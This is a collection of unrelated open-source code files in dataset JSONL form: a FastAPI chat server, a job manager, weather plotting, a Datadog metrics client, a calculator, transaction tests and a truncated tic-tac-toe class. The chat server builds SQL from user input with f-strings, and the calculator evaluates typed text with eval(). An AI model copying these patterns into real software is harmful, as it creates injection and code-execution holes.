str\n\n\nclass Room(BaseModel):\n title: str\n users: str\n password: str\n code: str\n record: str\n\n\nclass Memo(BaseModel):\n title: str\n content: str\n\n\ndatabase = Database(\"sqlite:///./database/database.db\")\n\n\n@app.on_event(\"startup\")\nasync def database_connect():\n await database.connect()\n\n\n@app.on_event(\"shutdown\")\nasync def database_disconnect():\n await database.disconnect()\n\n\n@app.post('/api/database/chatting')\nasync def post_chat_message(chat: Chat):\n chat_dict = chat.dict()\n\n query = \"INSERT INTO chat (message, user, time) VALUES (:message, :user, :time)\"\n results = await database.execute_many(query=query, values=[chat_dict])\n\n return results\n\n\n@app.get('/api/database/chatting')\nasync def get_chat_message():\n query = \"SELECT * FROM chat\"\n results = await database.fetch_all(query=query)\n\n return results\n\n\n@app.post('/api/database/meeting')\nasync def create_meeting_room(room: Room):\n room_dict = room.dict()\n\n query = \"INSERT INTO meeting_list (title, users, password, code, record) VALUES (:title, :users, :password, :code, :record)\"\n\n results = await database.execute(query=query, values=room_dict)\n\n return results\n\n\n@app.get('/api/database/meeting')\nasync def get_meeting_room(code: str):\n if code == '':\n query = \"SELECT * FROM meeting_list WHERE record = 'true'\"\n results = await database.fetch_all(query=query)\n else:\n query = f\"SELECT * FROM meeting_list WHERE code = '{code}'\"\n results = await database.fetch_one(query=query)\n return results\n\n\n@app.delete('/api/database/meeting/{meeting_num}')\nasync def delete_meeting_room(meeting_num: int):\n query = f\"DELETE FROM meeting_list WHERE number = {meeting_num}\"\n results = await database.execute(query=query)\n\n return results\n\n\n@app.post('/api/database/memo')\nasync def create_memo(memo: Memo):\n from datetime import datetime\n now = datetime.now()\n\n memo_dict = memo.dict()\n\n memo_title = memo_dict['title']\n memo_content = memo_dict['content']\n\n query = \"INSERT INTO memo (title, content, time) VALUES (:title, :content, :time)\"\n\n value = {\n 'title': memo_title,\n 'content': memo_content,\n 'time': str(now.date())\n }\n\n results = await database.execute(query=query, values=value)\n\n return results\n\n\n@app.get('/api/database/memo')\nasync def get_memo():\n query = \"SELECT * FROM memo\"\n results = await database.fetch_all(query=query)\n\n return results\n\n\n@app.delete('/api/database/memo/{memo_num}')\nasync def delete_memo(memo_num: int):\n query = f\"DELETE FROM memo WHERE number = {memo_num}\"\n results = await database.execute(query=query)\n\n return results\n","repo_name":"seokmin12/OnlineChatting","sub_path":"server/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":4810,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"} +{"seq_id":"12524859621","text":"from typing import Callable\nimport multiprocessing\nimport ozflux_logging\n\nclass Task:\n\t\"\"\"\n\tBase class for runnable classes.\n\t\"\"\"\n\tdef exec(self, pcb: Callable[[float], None]):\n\t\tpass\n\nclass _Job(multiprocessing.Process):\n\t\"\"\"\n\tRepresents a parallel job.\n\t\"\"\"\n\tdef __init__(self, id: int, weight: int\n\t \t, task: Task\n\t \t, progress_reader: multiprocessing.connection.Connection\n\t \t, progress_writer: multiprocessing.connection.Connection):\n\t\t\"\"\"\n\t\tCreate a new _Job instance.\n\n\t\t@param id: Unique ID assigned to this job (used for progress reporting).\n\t\t@param weight: Weighting of this job's progress relative to other jobs'.\n\t\t@param task: The function to be called which performs work.\n\t\t@param progres_reader: Read connection to the subprocess' stdout pipe.\n\t\t@param progres_writer: Write connection to the subprocess' stdout pipe.\n\t\t\"\"\"\n\t\tmultiprocessing.Process.__init__(self)\n\t\tself.id = id\n\t\tself.weight = weight\n\t\tself.task = task\n\t\tself.progress_reader = progress_reader\n\t\tself.progress_writer = progress_writer\n\t\tself.progress = 0.0\n\n\tdef _progress_local(self, progress: float, start: float, total_weight:float):\n\t\t\"\"\"\n\t\tProgress reporting function used when the job is run locally.\n\n\t\t@param progress: The new progress.\n\t\t@param start: The weight of all jobs completed before this one.\n\t\t@param total_weight: The total weight of all jobs.\n\t\t\"\"\"\n\t\tself.progress = progress\n\t\toverall = (start + self.weight * progress) / total_weight\n\t\tozflux_logging.log_progress(overall)\n\n\tdef run(self):\n\t\t# Do main processing.\n\t\tself.task.exec(lambda p: self.progress_writer.send( (p, self.id) ))\n\n\t\t# Close progress reporter pipe.\n\t\tself.progress_writer.close()\n\n\tdef run_local(self, start: float, total_weight: float):\n\t\t\"\"\"\n\t\tRun this job on the current thread (ie not in a separate process).\n\n\t\t@param start: Total weight of all jobs already finished.\n\t\t@param total_weight: Total weight of all jobs.\n\t\t\"\"\"\n\t\tself.task.exec(lambda p: self._progress_local(p, start, total_weight))\n\nclass JobManager:\n\tdef __init__(self):\n\t\t\"\"\"\n\t\tCreate a new JobManager.\n\t\t\"\"\"\n\t\t# # True iff jobs are allowed to run in parallel. False otherwise.\n\t\t# self.allow_parallel = allow_parallel\n\n\t\t# Total weight of all jobs. Access to this is controlled by _weights_lock.\n\t\tself._total_weight: int = 0\n\n\t\t# List of all submitted jobs (not running jobs!).\n\t\tself._jobs: list[_Job] = []\n\n\t\tself._lock = multiprocessing.BoundedSemaphore(1)\n\n\tdef _progress_reporter(self, progress: float, id: int):\n\t\t\"\"\"\n\t\tThis function is called by the wait() function when a progress report is\n\t\treceived from one of the child processes.\n\n\t\t@param progress: Progress of this job in range [0, 1].\n\t\t@param id: ID of the job which has reported its progress.\n\t\t\"\"\"\n\n\t\tjob = self._jobs[id]\n\n\t\tweight = job.weight / self._total_weight\n\n\t\tjob.progress = weight * progress\n\n\t\t# No need to check if in parallel mode, as the mutex is easily\n\t\t# obtained when running in serial mode.\n\t\taggregate_progress = sum([j.progress for j in self._jobs])\n\t\tozflux_logging.log_progress(aggregate_progress)\n\n\tdef add_job(self, task: Task, weight: int = 1):\n\t\t\"\"\"\n\t\tRegister a job with the job manager. A job can be any function which\n\t\treports its progress.\n\n\t\tNo progress reporting will occur until wait() is called.\n\n\t\t@param task: The job's execution function. This is any function which\n\t\t\t\t\t reports progress via a callable argument.\n\t\t@param weight: Absolute weight for this job. Higher value means progress\n\t\t\t\t\tin this job counts for proportionately more out of the\n\t\t\t\t\taggregate progress of all jobs. The way that the weight is\n\t\t\t\t\tcalculated should be consistent over all jobs, and it must\n\t\t\t\t\tbe positive.\n\t\t\"\"\"\n\t\twith self._lock:\n\t\t\t# Get a job ID.\n\t\t\tjob_id = len(self._jobs)\n\n\t\t\t# Update job weights. Note that the newly-added job weight should have\n\t\t\t# index job_id.\n\t\t\tself._total_weight += weight\n\n\t\t\t# Create a pipe for 1-way communication (progress reporting).\n\t\t\treader, writer = multiprocessing.connection.Pipe(duplex = False)\n\n\t\t\t# Start the process.\n\t\t\tjob = _Job(job_id, weight, task, reader, writer)\n\n\t\t\t# Store the process handle for later use.\n\t\t\tself._jobs.append(job)\n\n\tdef _get_num_running_jobs(self):\n\t\t\"\"\"\n\t\tGet the number of currently running jobs.\n\t\t\"\"\"\n\t\treturn len([j for j in self._jobs if j.is_alive()])\n\n\tdef run_parallel(self, max_para: int = multiprocessing.cpu_count()):\n\t\t\"\"\"\n\t\tRun all jobs in parallel and wait for them to finish.\n\t\t@param max_para: Maximum number of jobs to run in parallel. Defaults to logical CPU count.\n\t\t\"\"\"\n\t\twith self._lock:\n\t\t\tfor job in self._jobs:\n\t\t\t\t# If number of running jobs exceeds available number of CPUs,\n\t\t\t\t# wait for one job to finish.\n\t\t\t\tnum_running = self._get_num_running_jobs()\n\t\t\t\tif num_running >= max_para:\n\t\t\t\t\tself._wait_until(lambda: self._get_num_running_jobs() < max_para)\n\n\t\t\t\tjob.start()\n\n\t\t\t\t# Close the writable end of the pipe now, to be sure that p is\n\t\t\t\t# the only process which owns a handle for it. This ensures that\n\t\t\t\t# when p closes its handle for the writable end, wait() will\n\t\t\t\t# promptly report the readable end as being ready.\n\t\t\t\tjob.progress_writer.close()\n\n\t\t\t\t# Wait until job starts, to prevent race conditions.\n\t\t\t\tself._wait_until(lambda: job.is_alive())\n\n\t\t\t# Wait until all jobs are finished.\n\t\t\tself._wait_until()\n\t\t\tfor process in self._jobs:\n\t\t\t\tprocess.join()\n\n\tdef run_single_threaded(self):\n\t\t\"\"\"\n\t\tRun all jobs one at a time, in the current thread, and wait for them to\n\t\tfinish.\n\t\t\"\"\"\n\t\twith self._lock:\n\t\t\tcum_weight = 0\n\t\t\tfor job in self._jobs:\n\t\t\t\t# The pipe connection is not required.\n\t\t\t\tjob.progress_reader.close()\n\t\t\t\tjob.progress_writer.close()\n\n\t\t\t\tjob.run_local(cum_weight, self._total_weight)\n\t\t\t\tcum_weight += job.weight\n\n\tdef _wait_until(self, condition: Callable[[], bool] = lambda: False):\n\t\t\"\"\"\n\t\tWait for all parallel jobs to finish running, or the given condition\n\t\treturns true. Note that no progress messages will be written until this\n\t\tis called.\n\n\t\t@param condition: Optional function which returns a bool. If this\n\t\tfunction returns true, waiting will cease. If no condition is given,\n\t\tthis function will wait until all jobs have finished.\n\t\t\"\"\"\n\t\treaders = [j.progress_reader for j in self._jobs if j.is_alive()]\n\t\twhile readers:\n\t\t\tfor reader in readers:\n\t\t\t\ttry:\n\t\t\t\t\tif condition():\n\t\t\t\t\t\treturn\n\t\t\t\t\tmsg = None\n\t\t\t\t\tif reader.poll():\n\t\t\t\t\t\tmsg = reader.recv()\n\t\t\t\t\t\t(progress, process_index) = msg\n\t\t\t\t\t\tself._progress_reporter(progress, process_index)\n\t\t\t\texcept EOFError:\n\t\t\t\t\treaders.remove(reader)\n\n","repo_name":"hie-dave/lpj-scripts","sub_path":"ozflux-lpjg/ozflux_parallel.py","file_name":"ozflux_parallel.py","file_ext":"py","file_size_in_byte":6518,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"63"} +{"seq_id":"35647585675","text":"from datetime import datetime\n\nimport matplotlib.patches as patches\nfrom matplotlib.dates import DateFormatter\nfrom matplotlib.figure import Figure\n\n\nclass WeatherPlot(Figure):\n\n def __init__(self):\n super().__init__(figsize=(12, 8), dpi=90)\n self.__paramsPlot = [[u\"Temperatura [\\u00B0C]\", \"Ciśnienie [hPa]\", \"red\", \"blue\"],\n [\"Zachmurzenie [%]\", \"Wilgotność [%]\", \"grey\", \"orange\"]]\n self.__city = None\n self.__state = None\n self.__country = None\n self.__rot = 0\n\n def forecastPlot(self, data, city, state, country):\n self.__city = city\n self.__state = state\n self.__country = country\n processed = {\"time\": [], \"temp\": [], \"pressure\": [], \"clouds\": [], \"humidity\": []}\n for point in data[\"hourly\"]:\n date = datetime.fromtimestamp(point[\"dt\"])\n processed[\"time\"].append(date)\n processed[\"temp\"].append(point[\"temp\"])\n processed[\"pressure\"].append(point[\"pressure\"])\n processed[\"clouds\"].append(point[\"clouds\"])\n processed[\"humidity\"].append(point[\"humidity\"])\n self.__weatherPlot(processed, \"Prognoza\", \"%H:%M\\n%d.%m\")\n\n def historicalPlot(self, data, city, state, country):\n self.__city = city\n self.__state = state\n self.__country = country\n processed = {\"time\": [], \"temp\": [], \"pressure\": [], \"clouds\": [], \"humidity\": []}\n for point in data[\"hourly\"]:\n date = datetime.fromtimestamp(point[\"dt\"])\n processed[\"time\"].append(date.strftime(\"%H:%M\"))\n processed[\"temp\"].append(point[\"temp\"])\n processed[\"pressure\"].append(point[\"pressure\"])\n processed[\"clouds\"].append(point[\"clouds\"])\n processed[\"humidity\"].append(point[\"humidity\"])\n text = datetime.fromtimestamp(data[\"hourly\"][0][\"dt\"]).strftime(\"%d.%m.%y\")\n self.__rot = 45\n self.__weatherPlot(processed, text, None)\n\n def __weatherPlot(self, processed, text, dateformat):\n self.__addPlot(processed[\"time\"], processed[\"temp\"], processed[\"pressure\"], text, 211, 0, dateformat)\n self.__addPlot(processed[\"time\"], processed[\"clouds\"], processed[\"humidity\"], text, 212, 1, dateformat)\n\n def __addPlot(self, x, y, z, text, pos, i, dateFormat):\n a = self.add_subplot(pos)\n a.minorticks_on()\n a.tick_params(axis='x', labelrotation=self.__rot)\n if pos == 211:\n a.set_title(f\"{text}: pogoda dla {self.__city} - {self.__state} - {self.__country}\")\n a.set_ylabel(self.__paramsPlot[i][0])\n a.plot(x, y, self.__paramsPlot[i][2])\n if dateFormat is not None:\n a.xaxis.set_major_formatter(DateFormatter(dateFormat))\n\n b = a.twinx()\n b.minorticks_on()\n b.set_ylabel(self.__paramsPlot[i][1])\n b.plot(x, z, self.__paramsPlot[i][3])\n\n paramLeg1 = patches.Patch(color=self.__paramsPlot[i][2], label=self.__paramsPlot[i][0])\n paramLeg2 = patches.Patch(color=self.__paramsPlot[i][3], label=self.__paramsPlot[i][1])\n b.legend(handles=[paramLeg1, paramLeg2], loc=\"upper right\", framealpha=1)\n","repo_name":"weaweg/weatherApp","sub_path":"weather/WeatherPlot.py","file_name":"WeatherPlot.py","file_ext":"py","file_size_in_byte":3175,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"} +{"seq_id":"11339720783","text":"# stdlib\nimport time\nfrom numbers import Number\n\n# datadog\nfrom datadog.api.exceptions import ApiError\nfrom datadog.api.resources import SearchableAPIResource, SendableAPIResource\n\n\nclass Metric(SearchableAPIResource, SendableAPIResource):\n \"\"\"\n A wrapper around Metric HTTP API\n \"\"\"\n _class_url = None\n _json_name = 'series'\n\n _METRIC_QUERY_ENDPOINT = '/query'\n _METRIC_SUBMIT_ENDPOINT = '/series'\n\n @classmethod\n def _process_points(cls, points):\n \"\"\"\n Format `points` parameter.\n\n Input:\n a value or (timestamp, value) pair or a list of value or (timestamp, value) pairs\n\n Returns:\n list of (timestamp, float value) pairs\n\n \"\"\"\n now = time.time()\n points_lst = points if isinstance(points, list) else [points]\n\n def rec_parse(points_lst):\n \"\"\"\n Recursively parse a list of values or a list of (timestamp, value) pairs to a list of\n (timestamp, `float` value) pairs.\n \"\"\"\n try:\n if not points_lst:\n return []\n\n point = points_lst.pop()\n timestamp = now if isinstance(point, Number) else point[0]\n value = float(point) if isinstance(point, Number) else float(point[1])\n\n point = [(timestamp, value)]\n\n return point + rec_parse(points_lst)\n\n except TypeError as e:\n raise TypeError(\n u\"{0}: \"\n \"`points` parameter must use real numerical values.\".format(e)\n )\n\n except IndexError as e:\n raise IndexError(\n u\"{0}: \"\n u\"`points` must be a list of values or \"\n u\"a list of (timestamp, value) pairs\".format(e)\n )\n\n return rec_parse(points_lst)\n\n @classmethod\n def send(cls, metrics=None, **single_metric):\n \"\"\"\n Submit a metric or a list of metrics to the metric API\n\n :param metric: the name of the time series\n :type metric: string\n\n :param points: a (timestamp, value) pair or list of (timestamp, value) pairs\n :type points: list\n\n :param host: host name that produced the metric\n :type host: string\n\n :param tags: list of tags associated with the metric.\n :type tags: string list\n\n :param type: type of the metric\n :type type: 'gauge' or 'counter' string\n\n :returns: JSON response from HTTP request\n \"\"\"\n def rename_metric_type(metric):\n \"\"\"\n FIXME DROPME in 1.0:\n\n API documentation was illegitimately promoting usage of `metric_type` parameter\n instead of `type`.\n To be consistent and avoid 'backward incompatibilities', properly rename this parameter.\n \"\"\"\n if 'metric_type' in metric:\n metric['type'] = metric.pop('metric_type')\n\n # Set the right endpoint\n cls._class_url = cls._METRIC_SUBMIT_ENDPOINT\n\n # Format the payload\n try:\n if metrics:\n for metric in metrics:\n if isinstance(metric, dict):\n rename_metric_type(metric)\n metric['points'] = cls._process_points(metric['points'])\n metrics_dict = {\"series\": metrics}\n else:\n rename_metric_type(single_metric)\n single_metric['points'] = cls._process_points(single_metric['points'])\n metrics = [single_metric]\n metrics_dict = {\"series\": metrics}\n\n except KeyError:\n raise KeyError(\"'points' parameter is required\")\n\n return super(Metric, cls).send(attach_host_name=True, **metrics_dict)\n\n @classmethod\n def query(cls, **params):\n \"\"\"\n Query metrics from Datadog\n\n :param start: query start timestamp\n :type start: POSIX timestamp\n\n :param end: query end timestamp\n :type end: POSIX timestamp\n\n :param query: metric query\n :type query: string query\n\n :return: JSON response from HTTP request\n\n *start* and *end* should be less than 24 hours apart.\n It is *not* meant to retrieve metric data in bulk.\n\n >>> api.Metric.query(start=int(time.time()) - 3600, end=int(time.time()),\n query='avg:system.cpu.idle{*}')\n \"\"\"\n # Set the right endpoint\n cls._class_url = cls._METRIC_QUERY_ENDPOINT\n\n # `from` is a reserved keyword in Python, therefore\n # `api.Metric.query(from=...)` is not permited\n # -> map `start` to `from` and `end` to `to`\n try:\n params['from'] = params.pop('start')\n params['to'] = params.pop('end')\n except KeyError as e:\n raise ApiError(\"The parameter '{0}' is required\".format(e.args[0]))\n\n return super(Metric, cls)._search(**params)\n","repo_name":"alimoslehirad/django-metrics-prometheus","sub_path":"weather-app/venv/lib/python3.8/site-packages/datadog/api/metrics.py","file_name":"metrics.py","file_ext":"py","file_size_in_byte":5005,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"63"} +{"seq_id":"74443106441","text":"import subprocess\r\nimport os\r\n\r\nAUTOTEST_ENVIRONMENT = '%CD%\\\\environment\\\\sdk\\\\platform-tools;%CD%\\\\environment\\\\sdk\\\\tools;%CD%\\\\environment\\\\nodejs;%CD%\\\\environment\\\\jdk\\\\bin'\r\n\r\nos.system('setx -m JAVA_HOME %CD%\\environment\\jdk')\r\nos.system('setx -m ANDROID_HOME %CD%\\environment\\sdk')\r\nos.system('setx -m AUTOTEST_ENVIRONMENT ' + AUTOTEST_ENVIRONMENT)\r\n\r\nresult = subprocess.check_output('reg query \"HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Session Manager\\Environment\" /v Path', shell=True)\r\nresult = result[result.index('REG_EXPAND_SZ') + 13:].strip()\r\nif '%AUTOTEST_ENVIRONMENT%' not in result:\r\n os.system('setx -m PATH ' + '\\\"'+ '%AUTOTEST_ENVIRONMENT%;' + result + '\\\"')\r\n\r\nraw_input('...')\r\n\r\n","repo_name":"Ruiqi-Alipay/AutomationEnvironment","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":720,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"} +{"seq_id":"26562602946","text":"input = [4, 6, 2, 9, 1, 8]\n# 4 6 2 9 1\n# - - - - - 0~4\n# 1 6 2 9 4\n# - - - - 1~4\n# 1 2 4 6 9\n# - - - 2~4\n# 1 2 4 6 9\n# - - 3~4\n\n# 1. 시도할 index 읽히는지 for문 먼저 돌려보기\n# 0~4, 1~4, 2~4, 3~4\n# for i in range(5-1):\n# for j in range(5-i):\n# print(i+j)\n\n# O(N^2)\ndef selection_sort(array):\n n = len(array)\n for i in range(n - 1):\n min_index = i\n for j in range(n - i):\n # i+j : 현재 시도해보고 있는 index\n if array[i + j] < array[min_index]:\n min_index = i + j\n array[i], array[min_index] = array[min_index], array[i]\n\n return\n\nselection_sort(input)\nprint(input) # [1, 2, 4, 6, 9] 가 되어야 합니다!","repo_name":"hortenssiaa/break-through-algorithms","sub_path":"week3/02_selection_sort_tt.py","file_name":"02_selection_sort_tt.py","file_ext":"py","file_size_in_byte":755,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"} +{"seq_id":"70111011080","text":"import tkinter\nimport customtkinter\n\nclass Calculator:\n\n # Constructor\n def __init__(self):\n customtkinter.set_appearance_mode(\"Dark\")\n customtkinter.set_default_color_theme(\"dark-blue\")\n\n self.app = customtkinter.CTk()\n self.app.geometry(\"240x360\")\n self.app.resizable(0, 0)\n self.app.title(' Calculator')\n self.app.iconbitmap('logo.ico')\n\n self.scvalue = tkinter.StringVar()\n self.scvalue.set(\"\")\n self.expression = customtkinter.CTkEntry(self.app, textvar = self.scvalue, width = 190, height = 35, corner_radius = 8,\n justify = 'right')\n self.expression.place(x = 20, y = 20)\n self.expression.update()\n\n # 1 Row\n self.b1 = customtkinter.CTkButton(self.app, text = '9', width = 40, height = 40, text_font = ('Consolas', 14),\n command = lambda: self.button_clicked(self.b1))\n self.b1.place(x = 20, y = 70)\n\n self.b2 = customtkinter.CTkButton(self.app, text = '8', width = 40, height = 40, text_font = ('Consolas', 14),\n command = lambda: self.button_clicked(self.b2))\n self.b2.place(x = 70, y = 70)\n\n self.b3 = customtkinter.CTkButton(self.app, text = '7', width = 40, height = 40, text_font = ('Consolas', 14),\n command = lambda: self.button_clicked(self.b3))\n self.b3.place(x = 120, y = 70)\n\n self.b4 = customtkinter.CTkButton(self.app, text = 'C', width = 40, height = 40, text_font = ('Consolas', 14),\n command = lambda: self.button_clicked(self.b4))\n self.b4.place(x = 170, y = 70)\n\n # 2 Row\n self.b5 = customtkinter.CTkButton(self.app, text = '6', width = 40, height = 40, text_font = ('Consolas', 14),\n command = lambda: self.button_clicked(self.b5))\n self.b5.place(x = 20, y = 120)\n\n self.b6 = customtkinter.CTkButton(self.app, text = '5', width = 40, height = 40, text_font = ('Consolas', 14),\n command = lambda: self.button_clicked(self.b6))\n self.b6.place(x = 70, y = 120)\n\n self.b7 = customtkinter.CTkButton(self.app, text = '4', width = 40, height = 40, text_font = ('Consolas', 14),\n command = lambda: self.button_clicked(self.b7))\n self.b7.place(x = 120, y = 120)\n\n self.b8 = customtkinter.CTkButton(self.app, text = '+', width = 40, height = 40, text_font = ('Consolas', 14),\n command = lambda: self.button_clicked(self.b8))\n self.b8.place(x = 170, y = 120)\n\n # 3 Row\n self.b9 = customtkinter.CTkButton(self.app, text = '3', width = 40, height = 40, text_font = ('Consolas', 14),\n command = lambda: self.button_clicked(self.b9))\n self.b9.place(x = 20, y = 170)\n\n self.b10 = customtkinter.CTkButton(self.app, text = '2', width = 40, height = 40, text_font = ('Consolas', 14),\n command = lambda: self.button_clicked(self.b10))\n self.b10.place(x = 70, y = 170)\n\n self.b11 = customtkinter.CTkButton(self.app, text = '1', width = 40, height = 40, text_font = ('Consolas', 14),\n command = lambda: self.button_clicked(self.b11))\n self.b11.place(x = 120, y = 170)\n\n self.b12 = customtkinter.CTkButton(self.app, text = '-', width = 40, height = 40, text_font = ('Consolas', 14),\n command = lambda: self.button_clicked(self.b12))\n self.b12.place(x = 170, y = 170)\n\n # 4 Row\n self.b13 = customtkinter.CTkButton(self.app, text = '.', width = 40, height = 40, text_font = ('Consolas', 14),\n command = lambda: self.button_clicked(self.b13))\n self.b13.place(x = 20, y = 220)\n\n self.b14 = customtkinter.CTkButton(self.app, text = '0', width = 40, height = 40, text_font = ('Consolas', 14),\n command = lambda: self.button_clicked(self.b14))\n self.b14.place(x = 70, y = 220)\n\n self.b15 = customtkinter.CTkButton(self.app, text = '%', width = 40, height = 40, text_font = ('Consolas', 14),\n command = lambda: self.button_clicked(self.b15))\n self.b15.place(x = 120, y = 220)\n\n self.b16 = customtkinter.CTkButton(self.app, text = '*', width = 40, height = 40, text_font = ('Consolas', 14),\n command = lambda: self.button_clicked(self.b16))\n self.b16.place(x = 170, y = 220)\n\n # 5 Row\n self.b17 = customtkinter.CTkButton(self.app, text = '=', width = 140, height = 40, text_font = ('Consolas', 14),\n command = lambda: self.button_clicked(self.b17))\n self.b17.place(x = 20, y = 270)\n\n self.b18 = customtkinter.CTkButton(self.app, text = '/', width = 40, height = 40, text_font = ('Consolas', 14),\n command = lambda: self.button_clicked(self.b18))\n self.b18.place(x = 170, y = 270)\n\n # Theme\n self.optionmenu = customtkinter.CTkOptionMenu(values = [\"Light\", \"Dark\", \"System\"], width = 90,\n command = self.change_theme)\n self.optionmenu.place(x = 70, y = 320)\n self.optionmenu.set(\"Dark\")\n\n # Button Press\n def button_clicked(self, button):\n text = button.text\n if text == \"=\":\n if self.scvalue.get().isdigit():\n value = int(self.scvalue.get())\n else:\n try:\n value = eval(self.expression.get())\n except Exception as e:\n value = \"Error\"\n\n self.scvalue.set(value)\n self.expression.update()\n elif text == \"C\":\n self.scvalue.set(\"\")\n self.expression.update()\n else:\n self.scvalue.set(self.scvalue.get() + text)\n self.expression.update()\n\n # Themes\n def change_theme(self, theme):\n customtkinter.set_appearance_mode(theme)\n\n # Tkinter Loop\n def run(self):\n self.app.mainloop()\n\nif __name__ == \"__main__\":\n calculator = Calculator()\n calculator.run()","repo_name":"JARUS23/Calculator","sub_path":"calculator.py","file_name":"calculator.py","file_ext":"py","file_size_in_byte":6424,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"} +{"seq_id":"7582248242","text":"from lto.accounts.ed25519.account_factory_ed25519 import AccountFactoryED25519 as AccountFactory\nfrom lto.transactions.sponsorship import Sponsorship\nfrom unittest import mock\nfrom time import time\nfrom lto import crypto\nimport pytest\nfrom freezegun import freeze_time\n\nclass TestSponsorship:\n\n ACCOUNT_SEED = \"df3dd6d884714288a39af0bd973a1771c9f00f168cf040d6abb6a50dd5e055d8\"\n account = AccountFactory('T').create_from_seed(ACCOUNT_SEED)\n\n def test_construct(self):\n transaction = Sponsorship('3N8TQ1NLN8KcwJnVZM777GUCdUnEZWZ85Rb')\n assert transaction.tx_fee == 500000000\n assert transaction.recipient == '3N8TQ1NLN8KcwJnVZM777GUCdUnEZWZ85Rb'\n\n\n @freeze_time(\"2021-01-14\")\n def test_sign_with(self):\n transaction = Sponsorship('3N8TQ1NLN8KcwJnVZM777GUCdUnEZWZ85Rb')\n assert transaction.is_signed() is False\n transaction.sign_with(self.account)\n assert transaction.is_signed() is True\n timestamp = int(time() * 1000)\n assert str(transaction.timestamp)[:-3] == str(timestamp)[:-3]\n assert transaction.sender == '3MtHYnCkd3oFZr21yb2vEdngcSGXvuNNCq2'\n assert transaction.sender_key_type == 'ed25519'\n assert transaction.sender_public_key == '4EcSxUkMxqxBEBUBL2oKz3ARVsbyRJTivWpNrYQGdguz'\n assert self.account.verify_signature(transaction.to_binary(), transaction.proofs[0])\n\n\n expected_v1 = {\n \"type\": 18,\n \"version\": 1,\n \"recipient\": '3N8TQ1NLN8KcwJnVZM777GUCdUnEZWZ85Rb',\n \"sender\": '3MtHYnCkd3oFZr21yb2vEdngcSGXvuNNCq2',\n \"senderPublicKey\": '4EcSxUkMxqxBEBUBL2oKz3ARVsbyRJTivWpNrYQGdguz',\n \"fee\": 500000000,\n 'senderKeyType': 'ed25519',\n \"timestamp\": 1326499200000,\n \"proofs\": ['3gEX99xgnNbbbTVsqZ2mVc1ed1pcAzsAmVoxTXYmhY2xnANNW9NoxXsLyy2m5xot2qXhXb5ZHgL6ZmeYeB1CctWe']\n }\n\n expected_v3 = {\n \"type\": 18,\n \"version\": 3,\n \"senderKeyType\": \"ed25519\",\n \"sender\": '3MtHYnCkd3oFZr21yb2vEdngcSGXvuNNCq2',\n \"senderPublicKey\": '4EcSxUkMxqxBEBUBL2oKz3ARVsbyRJTivWpNrYQGdguz',\n \"recipient\": '3N8TQ1NLN8KcwJnVZM777GUCdUnEZWZ85Rb',\n \"timestamp\": 1326499200000,\n \"fee\": 500000000,\n \"proofs\": ['3tTspKV5QemQsxPwoUttaLc7UabQquhSxw1m8qgA9ugiEuDJp2mV2hbcp1C959VrJ1iG8bNgnrTC55E43MDYqPqa']\n }\n\n @freeze_time(\"2021-01-14\")\n @pytest.mark.parametrize(\"version, expected\", [(1, expected_v1), (3, expected_v3)])\n def test_to_json(self, expected, version):\n transaction = Sponsorship('3N8TQ1NLN8KcwJnVZM777GUCdUnEZWZ85Rb')\n transaction.timestamp = 1326499200000\n transaction.version = version\n transaction.sign_with(self.account)\n assert transaction.to_json() == expected\n\n @mock.patch('src.lto.PublicNode')\n def test_broadcast(self, mock_PublicNode):\n transaction = Sponsorship('3N8TQ1NLN8KcwJnVZM777GUCdUnEZWZ85Rb')\n broadcasted_tx = Sponsorship('3N8TQ1NLN8KcwJnVZM777GUCdUnEZWZ85Rb')\n broadcasted_tx.id = '7cCeL1qwd9i6u8NgMNsQjBPxVhrME2BbfZMT1DF9p4Yi'\n\n mc = mock_PublicNode.return_value\n mc.broadcast.return_value = broadcasted_tx\n\n assert mc.broadcast(transaction) == broadcasted_tx\n\n @freeze_time(\"2021-01-14\")\n def test_from_data(self):\n data = {\n \"type\": 18,\n \"version\": 1,\n \"id\": \"8S2vD5dGCPhwS8jLzNQpSRYDBGXv6GKq6qT5yXUBWPgb\",\n \"sender\": \"3NBcx7AQqDopBj3WfwCVARNYuZyt1L9xEVM\",\n \"senderPublicKey\": \"7gghhSwKRvshZwwh6sG97mzo1qoFtHEQK7iM4vGcnEt7\",\n \"recipient\": \"3N9ChkxWXqgdWLLErWFrSwjqARB6NtYsvZh\",\n \"timestamp\": 1610410901000,\n \"fee\": 500000000,\n \"proofs\": [\n \"QKef6R8LrMBupBF9Ry8zjFTu3mexC55J6XNofDDQEcJnZJsRjZPnAk6Yn2eiHkqqd2uSjB2r58fC8QVLaVegQEz\"\n ],\n \"height\": 1225821\n }\n transaction = Sponsorship(data['recipient']).from_data(data)\n crypto.compare_data_transaction(data, transaction)\n","repo_name":"ltonetwork/lto-api.python","sub_path":"tests/transactions/sponsorship_test.py","file_name":"sponsorship_test.py","file_ext":"py","file_size_in_byte":4061,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"63"} +{"seq_id":"25432983175","text":"import sys\r\nimport random\r\nimport copy\r\nfrom btnode import BSTNode\r\nfrom btree import LinkedBST\r\n\r\n\r\nsys.setrecursionlimit(100000)\r\n\r\n\r\n\r\n\r\nclass Board:\r\n\r\n\r\n computer_symbol = 'X'\r\n user_symbol = 'O'\r\n\r\n def __init__(self):\r\n self.board = [[None, None, None], [None, None, None], [None, None, None]]\r\n self.last_position = [None, None]\r\n self.last_symbol = None\r\n\r\n def last_symbol(self):\r\n return self.last_symbol\r\n\r\n\r\n\r\n def put_symbol(self, position, symbol):\r\n if position[0] < 0 or position[0] > 2 or position[1] < 0 or position[1] > 2:\r\n raise ValueError('Please, enter right position!')\r\n elif self.board[position[0]][position[1]] is not None:\r\n raise ValueError('The position ia already filled!')\r\n else:\r\n self.board[position[0]][position[1]] = 